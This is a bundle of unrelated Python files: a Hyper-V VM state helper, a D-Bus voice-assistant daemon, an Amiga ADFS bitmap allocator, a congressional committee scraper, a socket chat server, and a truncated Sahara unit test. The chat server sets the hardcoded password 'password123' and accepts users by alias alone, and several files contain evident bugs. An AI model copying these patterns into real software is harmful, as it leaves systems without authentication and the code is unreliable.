"""Power on the specified instance."""
LOG.debug(_("Power on instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_ENABLED)
def _set_vm_state(self, vm_name, req_state):
try:
self._vmutils.set_vm_state(vm_name, req_state)
LOG.debug(_("Successfully changed state of VM %(vm_name)s"
" to: %(req_state)s"),
{'vm_name': vm_name, 'req_state': req_state})
except Exception as ex:
LOG.exception(ex)
msg = (_("Failed to change vm state of %(vm_name)s"
" to %(req_state)s") %
{'vm_name': vm_name, 'req_state': req_state})
raise vmutils.HyperVException(msg)
|
|
# -*- coding: utf-8 -*-
from scarlett.core.config import Config, ScarlettConfigLocations
import datetime
import os
import platform
import logging
import logging.config
import scarlett.errors
# NOTE: taken from scarlett_improved
try:
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from dbus.mainloop.glib import threads_init
import gobject
# Initialize gtk threading
gobject.threads_init()
# If the keyword argument set_as_default is given and is true, set the new
# main loop as the default for all new Connection or Bus instances.
threads_init()
DBusGMainLoop(set_as_default=True)
import pygst
pygst.require('0.10')
from scarlett.constants import *
from scarlett import __version__
except Exception:
gobjectnotimported = True
import textwrap
from functools import wraps
import time
import pprint
import redis
# Fore is used for coloured log output below; colorama provides it
from colorama import Fore
from scarlett.brain.scarlettbraini import ScarlettBrainImproved
import ast
# drops you down into pdb if exception is thrown
import sys
__author__ = 'Malcolm Jones'
__email__ = 'bossjones@theblacktonystark.com'
__version__ = '0.5.0'
Version = __version__  # for backward compatibility
# http://bugs.python.org/issue7980
datetime.datetime.strptime('', '')
UserAgent = 'Scarlett/%s Python/%s %s/%s' % (
__version__,
platform.python_version(),
platform.system(),
platform.release()
)
config = Config()
def init_logging():
for file in ScarlettConfigLocations:
try:
logging.config.fileConfig(os.path.expanduser(file))
except Exception:
pass
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('scarlett')
perflog = logging.getLogger('scarlett.perf')
log.addHandler(NullHandler())
perflog.addHandler(NullHandler())
init_logging()
# convenience function to set logging to a particular file
def set_file_logger(name, filepath, level=logging.INFO, format_string=None):
global log
if not format_string:
format_string = "%(asctime)s %(name)s [%(levelname)s]:%(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
fh = logging.FileHandler(filepath)
fh.setLevel(level)
formatter = logging.Formatter(format_string)
fh.setFormatter(formatter)
logger.addHandler(fh)
log = logger
def set_stream_logger(name, level=logging.DEBUG, format_string=None):
global log
if not format_string:
format_string = "%(asctime)s %(name)s [%(levelname)s]:%(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
fh = logging.StreamHandler()
fh.setLevel(level)
formatter = logging.Formatter(format_string)
fh.setFormatter(formatter)
logger.addHandler(fh)
log = logger
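# A minimal usage sketch (logger name and level are illustrative): route
# scarlett logging to a stream handler, as ScarlettSystem.__init__ does below.
# >>> import scarlett
# >>> scarlett.set_stream_logger('scarlett', level=logging.DEBUG)
# >>> scarlett.log.debug("hello from scarlett")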
class ScarlettSystemException(dbus.DBusException):
_dbus_error_name = 'org.scarlettapp.scarlettbotexception'
class ScarlettSystem(dbus.service.Object):
""" Actual scarlett bot object that has a brain, voice, etc """
DBUS_NAME = 'org.scarlettapp.scarlettdaemon'
DBUS_PATH = '/org/scarlettapp/scarlettdaemon'
_scarlett_services = []
def __init__(self):
bus_name = dbus.service.BusName(
ScarlettSystem.DBUS_NAME,
bus=dbus.SessionBus()
)
dbus.service.Object.__init__(
self,
bus_name,
ScarlettSystem.DBUS_PATH
)
self.loop = None
# DISABLED FOR NOW # self.pool = pool = create_worker_pool()
# These will later be populated w/ scarlett core objects in the
# ./bin/scarlett_improved
self.brain = None
self.player = None
self.speaker = None
scarlett.set_stream_logger('scarlett')
self.scarlett_version_info = textwrap.dedent('''\
Scarlett {version} ({platform})
Python {pymajor}.{pyminor}.{pymicro}
PyGst {pygst_version}
Gobject {gobject_version}
'''.format(
version=__version__,
platform=sys.platform,
pymajor=sys.version_info.major,
pyminor=sys.version_info.minor,
pymicro=sys.version_info.micro,
pygst_version=pygst._pygst_version,
gobject_version=gobject.gobject.glib_version
))
scarlett.log.debug(
Fore.GREEN +
"VERSION INFO: \n\n" +
self.scarlett_version_info
)
# reserved for things like scarlett's brain, listener, player, speaker
self.base_services = []
self.features = []
# DISABLED FOR NOW # self._brain = ScarlettBrainImproved(
# DISABLED FOR NOW # host=scarlett.config.get('redis', 'host'),
# DISABLED FOR NOW # port=scarlett.config.get('redis', 'port'),
# DISABLED FOR NOW # db=scarlett.config.get('redis', 'db')
# DISABLED FOR NOW # )
#scarlett.log.debug(Fore.GREEN + "Scarlett Creating Voice Object")
# scarlett.basics.voice.play_block('pi-listening')
# scarlett_says.say_block("helllllllllllloooo")
#self.listener = GstListenerImproved("gst", self._brain, self._voice, False)
def connect_features(self):
scarlett.log.info(Fore.GREEN + "would connect feature")
pass
def scarlett_event_cb(self, scarlett_obj, message):
"""Handle message send by webbrowser.
:param scarlett_obj: ServiceFeature obj that sent the message
:type scarlett_obj: scarlett.Feature
:param message: Message containing event data
:type message: dict
"""
scarlett.log.debug(Fore.GREEN + "(service -> gtk) %s", message)
# NOTE: ast.literal_eval raises an exception if the input is not a
# valid Python literal, so arbitrary code is never executed here.
# NOTE: prefer ast.literal_eval over eval; if the input ever needs to
# contain arbitrary Python expressions, the message format itself
# should be reconsidered.
event = ast.literal_eval(message)
scarlett.log.debug(Fore.GREEN + "Bus:Handling %s",
event['event_type'])
if event['event_type'] == 'service_state':
scarlett.log.debug(Fore.GREEN +
"RECIEVED: {} from time-started: {}".format(
event['event_type'], event['data'])
)
elif event['event_type'] == 'listener_hyp':
# TODO: Turn this into self.commander.check_cmd(hyp)
scarlett.log.debug(Fore.GREEN +
"RECIEVED: {} from listener-hyp: {}".format(
event['event_type'], event['data'])
)
else:
raise ValueError('Unknown scarlettTime message: {}'.format(event))
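# Illustrative sketch of the message format scarlett_event_cb expects, based
# on the handling above (field values are assumed): the string must be a
# Python literal that ast.literal_eval can turn into a dict, e.g.
# "{'event_type': 'listener_hyp', 'data': 'play music'}".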
@dbus.service.method('org.scarlettapp.scarlettdaemon',
in_signature='', out_signature='')
def main(self):
"""Main method used to start scarlett application."""
# All PyGTK applications must have a gtk.main(). Control ends here
# and waits for an event to occur (like a key press or mouse event).
# OLD # gtk.main()
# DISABLED FOR NOW # scarlett.log.info(Fore.GREEN +
# "Starting Home Assistant (%d threads)", self.pool.worker_count)
self.loop = gobject.MainLoop()
try:
self.loop.run()
except KeyboardInterrupt:
self.Exit()
@dbus.service.method('org.scarlettapp.scarlettdaemon',
in_signature='', out_signature='')
def destroy(self):
scarlett.log.debug(Fore.YELLOW + "Destroy signal occurred")
self.remove_from_connection()
self.loop.quit() # OLD # gobject.mainloop.quit()
@dbus.service.method("org.scarlettapp.scarlettdaemon",
in_signature='', out_signature='')
def Exit(self):
scarlett.log.debug(Fore.YELLOW + "Exit signal occurred")
self.remove_from_connection()
self.loop.quit()
|
|
import struct
import ctypes
from block.BitmapBlock import BitmapBlock
from block.BitmapExtBlock import BitmapExtBlock
from FSError import *
class ADFSBitmap:
def __init__(self, root_blk):
self.root_blk = root_blk
self.blkdev = self.root_blk.blkdev
# state
self.ext_blks = []
self.bitmap_blks = []
self.bitmap_data = None
self.valid = False
# bitmap block entries
self.bitmap_blk_bytes = root_blk.blkdev.block_bytes - 4
self.bitmap_blk_longs = root_blk.blkdev.block_longs - 1
# calc size of bitmap
self.bitmap_bits = self.blkdev.num_blocks - self.blkdev.reserved
self.bitmap_longs = (self.bitmap_bits + 31) / 32
self.bitmap_bytes = (self.bitmap_bits + 7) / 8
# number of blocks required for bitmap (and bytes consumed there)
self.bitmap_num_blks = (self.bitmap_longs + self.bitmap_blk_longs - 1) / self.bitmap_blk_longs
self.bitmap_all_blk_bytes = self.bitmap_num_blks * self.bitmap_blk_bytes
# blocks stored in root and in every ext block
self.num_blks_in_root = len(self.root_blk.bitmap_ptrs)
self.num_blks_in_ext = self.blkdev.block_longs - 1
# number of ext blocks required
self.num_ext = (self.bitmap_num_blks - self.num_blks_in_root + self.num_blks_in_ext - 1) / (self.num_blks_in_ext)
# start the free-block search at the root block
self.find_start = root_blk.blk_num
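# Worked example of the sizing math above for a standard DD floppy
# (illustrative numbers: 1760 blocks of 512 bytes, 2 reserved boot blocks):
#   bitmap_bits      = 1760 - 2             = 1758
#   bitmap_longs     = (1758 + 31) / 32     = 55
#   bitmap_blk_longs = 128 - 1              = 127
#   bitmap_num_blks  = (55 + 127 - 1) / 127 = 1
# With (typically) 25 bitmap pointers in the root block, num_ext works out
# to 0, i.e. no bitmap extension blocks are needed.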
def create(self):
# create data and preset with 0xff
self.bitmap_data = ctypes.create_string_buffer(self.bitmap_all_blk_bytes)
for i in xrange(self.bitmap_all_blk_bytes):
self.bitmap_data[i] = chr(0xff)
# clear bit for root block
blk_pos = self.root_blk.blk_num
self.clr_bit(blk_pos)
blk_pos += 1
# create ext blocks
for i in xrange(self.num_ext):
bm_ext = BitmapExtBlock(self.blkdev, blk_pos)
bm_ext.create()
self.clr_bit(blk_pos)
blk_pos += 1
self.ext_blks.append(bm_ext)
# create bitmap blocks
for i in xrange(self.bitmap_num_blks):
bm = BitmapBlock(self.blkdev, blk_pos)
bm.create()
self.clr_bit(blk_pos)
blk_pos += 1
self.bitmap_blks.append(bm)
# set pointers to ext blocks
if self.num_ext > 0:
self.root_blk.bitmap_ext_blk = self.ext_blks[0].blk_num
for i in xrange(self.num_ext-1):
bm_ext = self.ext_blks[i]
bm_ext_next = self.ext_blks[i+1]
bm_ext.bitmap_ext_blk = bm_ext_next.blk_num
# set pointers to bitmap blocks
cur_ext_index = 0
cur_ext_pos = 0
for i in xrange(self.bitmap_num_blks):
blk_num = self.bitmap_blks[i].blk_num
if i < self.num_blks_in_root:
# pointers in root block
self.root_blk.bitmap_ptrs[i] = blk_num
else:
# pointers in ext block
self.ext_blks[cur_ext_index].bitmap_ptrs[cur_ext_pos] = blk_num
cur_ext_pos += 1
if cur_ext_pos == self.num_blks_in_ext:
cur_ext_pos = 0
cur_ext_index += 1
self.valid = True
def write(self):
# write root block
self.root_blk.write()
# write ext blocks
for ext_blk in self.ext_blks:
ext_blk.write()
self.write_only_bits()
def write_only_bits(self):
# write bitmap blocks
off = 0
for blk in self.bitmap_blks:
blk.set_bitmap_data(self.bitmap_data[off:off+self.bitmap_blk_bytes])
blk.write()
off += self.bitmap_blk_bytes
def read(self):
self.bitmap_blks = []
bitmap_data = ""
# get bitmap blocks from root block
blocks = self.root_blk.bitmap_ptrs
for blk in blocks:
if blk == 0:
break
bm = BitmapBlock(self.blkdev, blk)
bm.read()
if not bm.valid:
raise FSError(INVALID_BITMAP_BLOCK, block=bm)
self.bitmap_blks.append(bm)
bitmap_data += bm.get_bitmap_data()
# now check extended bitmap blocks
ext_blk = self.root_blk.bitmap_ext_blk
while ext_blk != 0:
bm_ext = BitmapExtBlock(self.blkdev, ext_blk)
bm_ext.read()
self.ext_blks.append(bm_ext)
blocks = bm_ext.bitmap_ptrs
for blk in blocks:
if blk == 0:
break
bm = BitmapBlock(self.blkdev, blk)
bm.read()
if not bm.valid:
raise FSError(INVALID_BITMAP_BLOCK, block=bm)
bitmap_data += bm.get_bitmap_data()
self.bitmap_blks.append(bm)
ext_blk = bm_ext.bitmap_ext_blk
# check bitmap data
num_bm_blks = len(self.bitmap_blks)
num_bytes = self.bitmap_blk_bytes * num_bm_blks
if num_bytes != len(bitmap_data):
raise FSError(BITMAP_SIZE_MISMATCH, node=self, extra="got=%d want=%d" % (len(bitmap_data), num_bytes))
if num_bm_blks != self.bitmap_num_blks:
raise FSError(BITMAP_BLOCK_COUNT_MISMATCH, node=self, extra="got=%d want=%d" % (self.bitmap_num_blks, num_bm_blks))
# create a modifiable bitmap
self.bitmap_data = ctypes.create_string_buffer(bitmap_data)
self.valid = True
def find_free(self, start=None):
# give start of search
if start == None:
pos = self.find_start
else:
pos = start
# at most scan all bits
num = self.bitmap_bits
while num > 0:
# a free bit?
found = self.get_bit(pos)
old_pos = pos
pos += 1
if pos == self.bitmap_bits + self.blkdev.reserved:
pos = self.blkdev.reserved
if found:
# continue the next search at this position
self.find_start = pos
return old_pos
num -= 1
return None
def find_n_free(self, num, start=None):
first_blk = self.find_free(start)
if first_blk == None:
return None
if num == 1:
return [first_blk]
result = [first_blk]
for i in xrange(num-1):
blk_num = self.find_free()
if blk_num == None:
return None
if blk_num in result:
return None
result.append(blk_num)
return result
def get_num_free(self):
num = 0
for i in xrange(self.bitmap_bits):
if self.get_bit(i):
num+=1
return num
def alloc_n(self, num, start=None):
free_blks = self.find_n_free(num, start)
if free_blks == None:
return None
for b in free_blks:
self.clr_bit(b)
self.write_only_bits()
return free_blks
def dealloc_n(self, blks):
for b in blks:
self.set_bit(b)
self.write_only_bits()
def get_bit(self, off):
if off < self.blkdev.reserved or off >= self.blkdev.num_blocks:
return None
off = (off - self.blkdev.reserved)
long_off = off / 32
bit_off = off % 32
val = struct.unpack_from(">I", self.bitmap_data, long_off * 4)[0]
mask = 1 << bit_off
return (val & mask) == mask
# mark as free
def set_bit(self, off):
if off < self.blkdev.reserved or off >= self.blkdev.num_blocks:
return False
off = (off - self.blkdev.reserved)
long_off = off / 32
bit_off = off % 32
val = struct.unpack_from(">I", self.bitmap_data, long_off * 4)[0]
mask = 1 << bit_off
val = val | mask
struct.pack_into(">I", self.bitmap_data, long_off * 4, val)
return True
# mark as used
def clr_bit(self, off):
if off < self.blkdev.reserved or off >= self.blkdev.num_blocks:
return False
off = (off - self.blkdev.reserved)
long_off = off / 32
bit_off = off % 32
val = struct.unpack_from(">I", self.bitmap_data, long_off * 4)[0]
mask = 1 << bit_off
val = val & ~mask
struct.pack_into(">I", self.bitmap_data, long_off * 4, val)
return True
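# Worked example of the bit addressing used by get/set/clr_bit (numbers are
# illustrative, assuming reserved == 2): block 100 maps to offset 98, so
# long_off = 98 / 32 = 3, bit_off = 98 % 32 = 2, and the block's state is
# bit (1 << 2) of the big-endian 32-bit word at byte offset 3 * 4 = 12.
# A set bit means the block is free; clearing it marks the block as used.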
def dump(self):
print "Bitmap:"
print " ext: ",self.ext_blks
print " blks:",len(self.bitmap_blks)
print " bits:",len(self.bitmap_data) * 8,self.blkdev.num_blocks
def create_draw_bitmap(self):
bm = ctypes.create_string_buffer(self.blkdev.num_blocks)
for i in xrange(self.blkdev.num_blocks):
bm[i] = chr(0)
return bm
def print_free(self, brief=False):
bm = self.create_draw_bitmap()
res = self.blkdev.reserved
for i in xrange(self.blkdev.num_blocks):
if i >= res and self.get_bit(i):
bm[i] = 'F'
self.print_draw_bitmap(bm, brief)
def print_used(self, brief=False):
bm = self.create_draw_bitmap()
res = self.blkdev.reserved
for i in xrange(self.blkdev.num_blocks):
if i >= res and not self.get_bit(i):
bm[i] = '#'
self.print_draw_bitmap(bm, brief)
def draw_on_bitmap(self, bm):
# show reserved blocks
res = self.blkdev.reserved
bm[0:res] = "x" * res
# root block
bm[self.root_blk.blk_num] = 'R'
# bitmap blocks
for bm_blk in self.bitmap_blks:
bm[bm_blk.blk_num] = 'b'
# bitmap ext blocks
for ext_blk in self.ext_blks:
bm[ext_blk.blk_num] = 'B'
def print_draw_bitmap(self, bm, brief=False):
line = ""
blk = 0
blk_cyl = self.blkdev.sectors * self.blkdev.heads
found = False
for i in xrange(self.blkdev.num_blocks):
c = bm[i]
if ord(c) == 0:
c = '.'
else:
found = True
line += c
if i % self.blkdev.sectors == self.blkdev.sectors - 1:
line += " "
if i % blk_cyl == blk_cyl - 1:
if not brief or found:
print "%8d: %s" % (blk,line)
blk += blk_cyl
line = ""
found = False
|
|
import json
import lxml
from bs4 import BeautifulSoup
import re
import urllib2
def _get_soup(url):
# returns a beautiful soup object for further operations
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
response = opener.open(url)
return BeautifulSoup(response.read(), 'lxml')
def _get_url(year, month, day):
congress_number = str(_get_congress_number(year))
year = str(year)
month = str(month).zfill(2)
day = str(day).zfill(2)
url = 'https://www.gpo.gov/fdsys/pkg/CCAL-{c}scal-{y}-{m}-{d}/html/CCAL-{c}scal-{y}-{m}-{d}-pt2.htm'\
.format(c=congress_number,y=year,m=month,d=day)
return url
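# Example of the URL produced above for an assumed date, 2011-03-17 in the
# 112th Congress:
# https://www.gpo.gov/fdsys/pkg/CCAL-112scal-2011-03-17/html/CCAL-112scal-2011-03-17-pt2.htm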
def _get_years(congress_number):
# each Congress spans two calendar years; inverse of _get_congress_number
return [2*congress_number + 1787,2*congress_number + 1788]
def _get_congress_number(year):
if year%2==1:
return (year-1787)/2
else:
return (year-1788)/2
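# Worked example tying the two helpers together (illustrative year): 2011 is
# odd, so _get_congress_number(2011) = (2011 - 1787) / 2 = 112, and
# _get_years(112) = [2011, 2012] recovers both calendar years of that Congress.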
def _is_valid_page(soup):
text = soup.text
if re.search('Error Detected - The page you requested cannot be found.',text):
return False
else:
return True
def _get_date_from_url(url):
base_index = url.find('scal-')
# year = url[base_index+5:base_index+9]
# month = url[base_index+10:base_index+12]
# day = url[base_index+13:base_index+15]
return url[base_index+5:base_index+15]
def scan_on_a_congress_number(congress_number):
years = _get_years(congress_number)
months = range(1,13)
days = range(1,32)
urls = []
for year in years:
for month in months:
for day in days:
url = _get_url(year, month, day)
urls.append(url)
print '****** Finished creating all urls'
soups = []
valid_dates = []
for url in urls:
try:
soup = _get_soup(url)
soups.append(soup)
date = _get_date_from_url(url)
valid_dates.append(date)
except urllib2.HTTPError:
print 'HTTPError occurred at ' + url
except urllib2.URLError:
print 'URLError occurred at ' + url
except:
print '**** An unexpected error occurred at ' + url
raise
continue
print '****** Finished downloading all HTML pages'
all_committee_assignment_data = []
for soup in soups:
committee_assignment_data = _get_committee_assignments(soup)
all_committee_assignment_data.append(committee_assignment_data)
print '****** Finished fetching all committee assignment data'
result = {}
for index in range (0, len(all_committee_assignment_data)):
members = all_committee_assignment_data[index]
keys = members.keys()
for key in keys:
if result.has_key(key):
for committee_assignment_name in members[key]['committee_assignments']:
# record when this assignment was last seen; create the entry if it is new
result[key]['committee_assignments'].setdefault(committee_assignment_name, {'start_date': valid_dates[index]})['last_seen_date'] = valid_dates[index]
else:
result[key]={}
result[key]['state'] = members[key]['state']
result[key]['committee_assignments'] = {}
for committee_assignment_name in members[key]['committee_assignments']:
result[key]['committee_assignments'][committee_assignment_name] = {}
result[key]['committee_assignments'][committee_assignment_name]['start_date'] = valid_dates[index]
print 'finished parsing all data'
return result
def _get_committee_assignments(soup):
text = soup.find('pre').text
lines = text.split('\n')
results = {}
member = ''
current_committee_assignment = ''
for line in lines:
if _is_meaningful_line(line):
# print line + ' is meaningful'
line_type = _get_line_type(line)
if line_type == 'member':
display_name = _get_display_name(line)
state = _get_state(line)
# role = _get_role(line)
if results.has_key(display_name):
if _get_role(line) != 'member':
results[display_name]['committee_assignments'].append(current_committee_assignment + ', ' + _get_role(line))
else:
results[display_name]['committee_assignments'].append(current_committee_assignment)
else:
results[display_name] = {}
results[display_name]['state'] = state
# results[display_name]['role'] = role
results[display_name]['committee_assignments'] = []
if _get_role(line) != 'member':
results[display_name]['committee_assignments'].append(current_committee_assignment + ', ' + _get_role(line))
else:
results[display_name]['committee_assignments'].append(current_committee_assignment)
elif line_type == 'assignment':
current_committee_assignment = line.strip().title().replace('And','and')
# print 'here is a new committee ' + current_committee_assignment
else:
print 'this line is neither a committee nor a member'
print line
print '\n'
return results
def _is_meaningful_line(line):
line = line.replace('_','').strip()
black_list = ['COMMITTEE ASSIGNMENTS','STANDING COMMITTEES',',']
if (re.search('[\[\]]',line)!=None) or (line=='') or (line in black_list):
# lines that include brackets are usually only for
# page number, date of document and source of data
return False
else:
# print line + ' is meaningful'
return True
def _get_line_type(line):
line = line.strip()
if line.upper() == line:
print line + ' is an assignment'
# the specific committee assignment name is displayed
# as a string all in capital words
return 'assignment'
elif re.search(', of ',line):
# name, of state_full_name(, Chairman) <== optional
return 'member'
else:
print 'the following line was not recognized as either assignment or member'
print line
print '\n'
return None
def _get_display_name(member_line):
# Barbara A. Mikulski, of Maryland, Chairman
return member_line.split(', of ')[0]
def _get_state(member_line):
# Barbara A. Mikulski, of Maryland, Chairman
return member_line.split(', of ')[1].split(', ')[0]
def _get_role(member_line):
# Barbara A. Mikulski, of Maryland, Chairman
if len(member_line.split(', of ')[1].split(', ')) == 2:
return member_line.split(', of ')[1].split(', ')[1]
elif len(member_line.split(', of ')[1].split(', ')) == 1:
return 'member'
else:
print 'cannot extract role from the following line'
print member_line
print '\n'
if __name__ == '__main__':
data = scan_on_a_congress_number(112)
with open('scan_on_112_congress.JSON','w') as outfile:
json.dump(data, outfile, indent=4)
|
|
import socket
import sys
import threading
import CommonUtil
import functools
import time
import re
from messages.Message import Message as Message
from database.databaseinterface import databaseinterface
# welcome message sent to every user upon login
def welcome_message():
msg = Message('0000000000000000', '0000000000000000', 'server', '0000000000000000', 'welcome to TDO communication services','message')
return msg
db = databaseinterface()
class User:
def __init__(self, alias, userid, inport,outport):
self.alias = alias
self.id = userid
self.inport = inport
self.outport = outport
self.password ='password123'
self.currentchannel='0000000000000000'
self.channels = []
self.blockedChannels = []
#will add method for changing inport/outport in db
# todo implement DB connection
class Channel:
def __init__(self, name, permissions, id, blockedUsers=None):
self.name = name
self.blockedUsers = blockedUsers if blockedUsers is not None else []
self.users = []
self.id = id
self.permisions = permissions
# used to create a new channel; __init__ is used to fetch an existing one from the db
@staticmethod
def createNew(name, permissions):
if name == 'General':
id = '0000000000000000'
else:
id = CommonUtil.createID()
ch = Channel(name, permissions, id)
regex = re.match(r'([01]{3})', permissions)
if regex:
ch.permisions = permissions
else:
ch.permisions = '011'
db.newChannel(ch)
return ch
# ----------------------------------------------------------------------------------------------------------------------------------
# Server class and subclasses
# ----------------------------------------------------------------------------------------------------------------------------------
class Server:
def __init__(self):
self.Outbound = {}
self.Inbound = CommonUtil.Queue()
self.Error = CommonUtil.Queue()
self.Channels = []
self.Channels.append(Channel('General','011','0000000000000000'))
self.handler = self.PortHandler()
self.users = []
class PortHandler:
def __init__(self):
self.port = []
for i in range(20000, 10000, -1):
self.port.append(i)
# handler method for outbound connections
@staticmethod
def send(s, p):
msg = s.Outbound[p].Pop()
if msg:
return msg.encode()
@staticmethod
def error():
print('user left channel')
# handler method for inbound connections
def enqueue(self, p, d):
def validate(d):
pass
validate(d)
msg = Message.decode(d)
self.Inbound.Push(msg)
def dequeue(self):
while True:
msg = self.Inbound.Pop()
if msg:  # Pop returns None when the queue is empty, so processing is skipped
if msg.messageType == 'command': # checking if message is a command
# for loop runs over every command type, only one matches, running inner if once for processing
for command in CommonUtil.commands:
regex = re.match(CommonUtil.commands[command], msg.message)
if regex:
print regex.group(0)
if command == 'join':
ch = db.getChannel(regex.group(0))
if ch:
error= db.addUser(msg.messageChannelId, msg.messageSenderId) # returns none if successful
if error:
pass # send error
if command == 'create':
ch = db.getChannel(regex.group(0))
if ch:
pass # send user duplicate channel name error msg
else:
c = Channel.createNew(regex.group(0), regex.group(1))
error = db.newChannel(c)
if error:
pass # send error message
else:
db.addUser(c.id, msg.messageSenderId)
if command == 'set_alias':
if db.getUserAlias(regex.group(0)):
pass # send error message
else:
u = None #will add user initialization
db.changeUser(msg.messageSenderId, u)
if command == 'block':
if db.userHasPermisions(msg.messageSenderId, msg.messageChannelId):
if db.getUser(regex.group(0)):
db.getChannel(msg.messageChannelId).blockUser(db.getUser(regex.group(0)))
if command == 'unblock':
if db.userHasPermisions(msg.messageSenderId, msg.messageChannelId):
if db.getUser(regex.group(0)):
db.UnblockUser(msg.messageChannelId, regex.group(0))
if command == 'delete':
if db.userHasPermisions(msg.messageSenderId, msg.messageChannelId):
if db.deleteChannel(msg.messageChannelId):
pass#send error(unable to delete)
else:
pass#send permissions error
if command == 'chmod':
if db.userHasPermisions(db.getUser(msg.messageSenderId), db.getChannel(msg.messageChannelId)):
if regex.group(0) == msg.messageChannelId:
db.setChannelPermisions(msg.messageChannelId)
elif db.IsMember(msg.messageChannelId, msg.messageChannelId):
db.SetChannelPermisions(msg.messageChannelId, msg.messageChannelId, regex.group(1))
else:
pass # send error msg
else:
pass # send command not found error message
else:
print(msg.message)
for u in self.users:
if u.id != msg.messageSenderId and u.currentchannel == msg.messageChannelId:
self.Outbound[u.inport].Push(msg)
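# Illustrative flow for a non-command message, based on the routing above
# (channel id is assumed): a Message with messageType 'message' posted to
# channel '0000000000000000' is pushed onto the Outbound queue of every
# connected user whose currentchannel matches, except the sender.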
if __name__ == '__main__':
server = Server()
threading._start_new_thread(server.dequeue, ())  # starts thread that processes inbound messages and routes them to outbound queues
# setting up port for connecting to clients
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = socket.gethostname()
port = 9999
server_socket.bind((host, port))
server_socket.listen(10)
#while loop for handling new connections
while True:
clientsocket, addr = server_socket.accept()
print('Got a connection from %s' % str(addr))
p1 = server.handler.port.pop()
p2 = server.handler.port.pop()
alias = clientsocket.recv(1024)
user = db.getUserAlias(alias)
if user:
# db row assumed to be (alias, userid, ...); read the id before `user` is reassigned
uID = user[1]
user = User(user[0], uID, p1, p2)
else:
uID=CommonUtil.createID()
user = User(alias,uID,p1,p2)
db.newUser(user)
# sending the client the information on ports used
k = str(uID) + '|' + str(p1)+'|'+str(p2)
clientsocket.send(k.encode('utf8'))
# starting threads to manage connection
server.Outbound[p1] = CommonUtil.Queue()
server.Outbound[p1].Push(welcome_message())
server.users.append(user)
threading._start_new_thread(CommonUtil.outbound_connection_handler, (p1, functools.partial(server.send, server),server.error,))
time.sleep(0.05)
threading._start_new_thread(CommonUtil.inbound_connection_handler, (p2, functools.partial(server.enqueue, server),server.error,))
clientsocket.close()
|
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import mock
import six
import testtools
from sahara import conductor as cond
from sahara.service.edp import job_utils
from sahara.tests.unit.service.edp import edp_test_utils as u
conductor = cond.API
class JobUtilsTestCase(testtools.TestCase):
def setUp(self):
super(JobUtilsTestCase, self).setUp()
def test_args_may_contain_data_sources(self):
job_configs = None
# No configs, default false
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertFalse(by_name | by_uuid)
# Empty configs, default false
job_configs = {'configs': {}}
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertFalse(by_name | by_uuid)
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: True,
job_utils.DATA_SOURCE_SUBST_UUID: True}
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertTrue(by_name & by_uuid)
job_configs['configs'][job_utils.DATA_SOURCE_SUBST_NAME] = False
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertFalse(by_name)
self.assertTrue(by_uuid)
job_configs['configs'][job_utils.DATA_SOURCE_SUBST_UUID] = False
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertFalse(by_name | by_uuid)
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: 'True',
job_utils.DATA_SOURCE_SUBST_UUID: 'Fish'}
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertTrue(by_name)
self.assertFalse(by_uuid)
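# Reading of the assertions above: may_contain_data_source_refs evidently
# returns a (by_name, by_uuid) pair of booleans driven by the
# DATA_SOURCE_SUBST_NAME / DATA_SOURCE_SUBST_UUID configs, defaulting to
# False when configs are absent or empty; string values appear to be parsed
# rather than taken at truth value, since 'True' maps to True below while
# 'Fish' maps to False.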
def test_find_possible_data_source_refs_by_name(self):
id = six.text_type(uuid.uuid4())
job_configs = {}
self.assertEqual([],
job_utils.find_possible_data_source_refs_by_name(
job_configs))
name_ref = job_utils.DATA_SOURCE_PREFIX+'name'
name_ref2 = name_ref+'2'
job_configs = {'args': ['first', id],
'configs': {'config': 'value'},
'params': {'param': 'value'}}
self.assertEqual([],
job_utils.find_possible_data_source_refs_by_name(
job_configs))
job_configs = {'args': [name_ref, id],
'configs': {'config': 'value'},
'params': {'param': 'value'}}
self.assertEqual(
['name'],
job_utils.find_possible_data_source_refs_by_name(job_configs))
job_configs = {'args': ['first', id],
'configs': {'config': name_ref},
'params': {'param': 'value'}}
self.assertEqual(
['name'],
job_utils.find_possible_data_source_refs_by_name(job_configs))
job_configs = {'args': ['first', id],
'configs': {'config': 'value'},
'params': {'param': name_ref}}
self.assertEqual(
['name'],
job_utils.find_possible_data_source_refs_by_name(job_configs))
job_configs = {'args': [name_ref, name_ref2, id],
'configs': {'config': name_ref},
'params': {'param': name_ref}}
self.assertItemsEqual(
['name', 'name2'],
job_utils.find_possible_data_source_refs_by_name(job_configs))
def test_find_possible_data_source_refs_by_uuid(self):
job_configs = {}
name_ref = job_utils.DATA_SOURCE_PREFIX+'name'
self.assertEqual([],
job_utils.find_possible_data_source_refs_by_uuid(
job_configs))
id = six.text_type(uuid.uuid4())
job_configs = {'args': ['first', name_ref],
'configs': {'config': 'value'},
'params': {'param': 'value'}}
self.assertEqual([],
job_utils.find_possible_data_source_refs_by_uuid(
job_configs))
job_configs = {'args': [id, name_ref],
'configs': {'config': 'value'},
'params': {'param': 'value'}}
self.assertEqual(
[id],
job_utils.find_possible_data_source_refs_by_uuid(job_configs))
job_configs = {'args': ['first', name_ref],
'configs': {'config': id},
